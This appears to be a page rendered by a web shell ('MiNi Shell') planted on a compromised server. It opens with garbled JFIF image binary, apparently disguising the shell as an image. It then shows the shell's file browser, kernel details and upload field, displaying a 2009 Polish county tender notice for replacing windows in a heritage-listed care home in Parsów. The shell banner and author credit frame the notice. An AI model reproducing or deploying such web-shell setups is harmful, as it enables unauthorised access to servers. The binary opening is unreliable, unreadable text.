JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090910/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090910/313812-N-2009.html

<p class="kh_header"><b>Koszalin: WYMIANA  STOLARKI  W  DOMU  POMOCY  SPOŁECZNEJ W PARSOWIE 
W RAMACH PROJEKTU TERMOMODERNIZACJA OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ POWIATU KOSZALIŃSKIEGO</b><br>
<b>Numer ogłoszenia: 313812 - 2009; data zamieszczenia: 10.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Koszaliński , ul. Racławicka 13, 75-620 Koszalin, woj. zachodniopomorskie, tel. 094 3428489, faks 094 3462261.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA  STOLARKI  W  DOMU  POMOCY  SPOŁECZNEJ W PARSOWIE 
W RAMACH PROJEKTU TERMOMODERNIZACJA OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ POWIATU KOSZALIŃSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OBIEKT PAŁACOWY
1. Przedmiot  zamówienia obejmuje wymianę stolarki okiennej w następujących wymiarach i ilościach objętych podatkiem VAT 7%:
A)  okno drewniane  o wymiarach 	40cm/95cm	-1 szt.
B)  okno drewniane  o wymiarach 	50cm/95cm	- 1 szt.
C)  okno drewniane  o wymiarach	75cm/95cm	-1 szt.
D)  okno drewniane  o wymiarach	110cm/95cm - 13 szt.
E)  okno drewniane  o wymiarach 	70cm/110cm - 3 szt.
F)  okno drewniane  o wymiarach 	110cm/125cm - 7 szt.
G)  okno drewniane  o wymiarach	132cm/210cm - 3 szt.
H1) okno drewniane  o wymiarach	130cm/241cm - 1 szt.
H2)  okno drewniane  o wymiarach	130cm/241cm - 1szt.
I1) okno drewniane  o wymiarach	115cm/223cm - 6 szt.
I2) okno drewniane  o wymiarach	115cm/223cm - 23 szt.
J)  okno drewniane  o wymiarach	115cm/250cm - 1 szt.
K) okno drewniane  o wymiarach (z siatką przeciw owadom) 130cm/250cm - 3 szt.
L)  okno drewniane  o wymiarach	86cm/105cm - 1 szt.
Ł1) okno drewniane  o wymiarach (z siatką przeciw owadom) 125cm/240cm - 3 szt.
Ł2) okno drewniane  o wymiarach (z siatką przeciw owadom) 125cm/240cm - 4 szt. 
M1) okno drewniane  o wymiarach	115cm/210cm - 1 szt.
M2) okno drewniane  o wymiarach	115cm/210cm - 2 szt.
N1) okno drewniane  o wymiarach	82cm/117cm - 10 szt.
N2) okno drewniane  o wymiarach	82cm/117cm - 10 szt.
O) okno drewniane  o wymiarach	135cm/223cm - 1 szt.
P1) okno drewniane  o wymiarach	80cm/195cm - 2 szt.
P2) okno drewniane  o wymiarach	80cm/195cm - 1 szt.
Q) okno drewniane  o wymiarach	135cm/310cm - 3 szt.
R) okno drewniane  o wymiarach	210cm/250cm - 2 szt.
R1) okno drewniane  o wymiarach	350cm/250cm - 2 szt.
S1) okno drewniane  o wymiarach	104cm/223cm - 1 szt.
S2) okno drewniane  o wymiarach	104cm/223cm - 1 szt.
S3) okno drewniane  o wymiarach	104cm/223cm - 1 szt.
T) okno drewniane  o wymiarach	110cm/255cm - 1 szt.
U) okno drewniane  o wymiarach	110cm/172cm - 2 szt.
V) okno drewniane  o wymiarach	80cm/80cm - 1 szt.
Wygląd i wymiary okien zostały określone w załącznikach nr 2 i 5 do SIWZ
2. Roboty obejmują:
a) demontaż okien drewnianych -  123 szt.
b) montaż okien z drewna klejonego w kolorze białym - 123 szt.
c) obrobienie ościeży okiennych - 123 kpl.
d) wymianę podokienników wewnętrznych - 123 szt.
OBIEKT  ADMINISTRACYJNO - MIESZKALNY
1. Przedmiot  zamówienia obejmuje wymianę stolarki okiennej  w następujących wymiarach i ilościach objętych podatkiem VAT 7%:
a)  okno drewniane  o wymiarach 	140cm/110cm -20 szt.
b) okno drewniane  o wymiarach 	140cm/110cm - 5 szt.
c) okno drewniane  o wymiarach	153cm/110cm - 3 szt.
d) okno drewniane  o wymiarach	153cm/110cm - 1 szt.
e) okno drewniane  o wymiarach 	140cm/135cm - 16 szt.
f) okno drewniane  o wymiarach 	140cm/135cm - 10 szt.
g) okno drewniane  o wymiarach	153cm/135cm -2 szt.
h) okno drewniane  o wymiarach	153cm/135cm - 2 szt.
i)  okno drewniane  o wymiarach	140cm/110cm - 2 szt.
j) okno drewniane  o wymiarach	93,5cm/100cm - 14 szt.
k) okno drewniane  o wymiarach	93,5cm/100cm - 10 szt.
Wygląd i wymiary okien zostały określone w załącznikach nr 2a i 5 do SIWZ
2. Roboty obejmują:
a) demontaż okien drewnianych - 85 szt.
b) montaż okien z drewna klejonego w kolorze białym - 85 szt.
c) obrobienie ościeży okiennych -  85 kpl.
d) wymianę podokienników wewnętrznych - 85 szt.
UWAGA!
Pałac wraz z otoczeniem (park krajobrazowy) w Parsowie, decyzją nr 387 z dnia 14.04.1964 r. został wpisany do rejestru zabytków i podlega ochronie konserwatorskiej. W związku z powyższym wymaganym jest aby wymiana stolarki nastąpiła bez zmiany istniejących gabarytów i wykończenia otworów okiennych oraz z zachowaniem wyglądu i kształtu stolarki. 
Szczegółowy opis przedmiotu zamówienia znajduje się  w  SIWZ  i załącznikach do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  9.000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w oparciu o art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
2. spełnią warunki zawarte w art. 22 ust. 1 ustawy prawo zamówień publicznych,
3. spełniają minimalne warunki merytoryczne związane z realizacją zamówienia określone    przez Zamawiającego,
4. spełniają wszystkie wymagania wynikające z formularza specyfikacji istotnych warunków zamówienia.
Minimalne warunki merytoryczne związane z realizacją zamówienia, do których spełnienia zobowiązany jest Wykonawca:
1. wykazać się doświadczeniem o charakterze i złożoności porównywalnej z zakresem robót będących przedmiotem niniejszego zamówienia - tzn. wykazać że w okresie ostatnich 5 lat, przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali lub realizują co najmniej 1 (jedno) zamówienie  polegające na dostawie i wymianie stolarki okiennej drewnianej  o wartości min. 150.000,00 PLN brutto i przedłożą dokument/y/ potwierdzający/e/, że zamówienie zostało zrealizowane (bądź jest realizowane) z   należytą starannością,      
2. posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów  do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń; 
3. dysponować osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia takich osób;
4. udzielić minimum 60-cio miesięcznej gwarancji na stolarkę okienną;
5. wykonać przedmiot zamówienia w terminie do 23.12.2009 r.;
6. zabezpieczyć ofertę wymaganym wadium.
Ocena  spełniania w/w warunków zostanie dokonana w oparciu  o  złożone przez Wykonawcę oświadczenia i dokumenty metodą  spełnia/nie spełnia.       
Uwaga: Wykonawca, z którym zostanie zawarta umowa zobowiązany będzie wyznaczyć osobę do pełnienia funkcji kierownika budowy, posiadającą uprawnienia do pełnienia samodzielnym funkcji w budownictwie w specjalności kontrukcyjno-budowlanej oraz legitymującą się aktualnym zaświadczeniem o przynależności do właściwej Izby Inżynierów Budownictwa. Wyznaczony przez Wykonawcę kierownik budowy musi uzyskać akceptację Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z ofertą jest zobowiązany złożyć następujące dokumenty i oświadczenia: 
1) oświadczenie Wykonawcy sporządzone na/lub wg druku Załącznik nr 4 do SIWZ, zawierające:
a) dane Wykonawcy,
b) oświadczenie Wykonawcy, że zawarty w specyfikacji istotnych warunków zamówienia wzór umowy wraz z formularzem karty gwarancyjnej (zał. nr 6 do SIWZ) został przez niego zaakceptowany i zobowiązuje się w przypadku wyboru jego oferty do zawarcia umowy w miejscu i terminie wyznaczonym przez Zamawiającego, 
c) oświadczenie Wykonawcy o akceptacji terminu związania ofertą,
d) oświadczenie Wykonawcy, że zapoznał się z treścią specyfikacji istotnych warunków zamówienia i nie wnosi do niej zastrzeżeń oraz, że zdobył konieczne informacje do przygotowania oferty,
e) oświadczenie o nie zaleganiu z opłacaniem składek na ubezpieczenie społeczne   i zdrowotne do Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego oraz o nie zaleganiu z opłacaniem podatków, opłat do urzędu skarbowego,
f) oświadczenie Wykonawcy do zapewnienia wysokiej jakości wykonywanych robót,
g) oświadczenie Wykonawcy o zapewnieniu kierownika budowy, posiadającego uprawnienia do pełnienia samodzielnych funkcji w budownictwie w specjalności konstrukcyjno-budowlanej oraz aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa, którego wybór zostanie zaakceptowany przez Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków.
2) oświadczenie Wykonawcy w trybie art. 22 ust. 1 i art. 24 ust. 1 i 2 Prawo zamówień publicznych -  Załącznik nr 3 do SIWZ;
3) wykaz osób upoważnionych do podpisywania oferty i podejmowania zobowiązań w imieniu Wykonawcy (o ile nie wynika to z innych dokumentów),
4) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
5) dowód wniesienia wadium zgodnie z wymaganiami określonymi w rozdziale III, pkt XII SIWZ;
6) wykaz wykonanych robót sporządzony na/lub wg załącznika nr 8 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.koszalin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> STAROSTWO POWIATOWE W KOSZALINIE 75-620 KOSZALIN, Ul.Racławicka 13 - pokój 301/302 (III piętro) tel.0943428333, 0943428511.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2009 godzina 14:00, miejsce: STAROSTWO POWIATOWE W KOSZALINIE 75-620 KOSZALIN, Ul.Racławicka 13 - pokój 301/302 (III piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com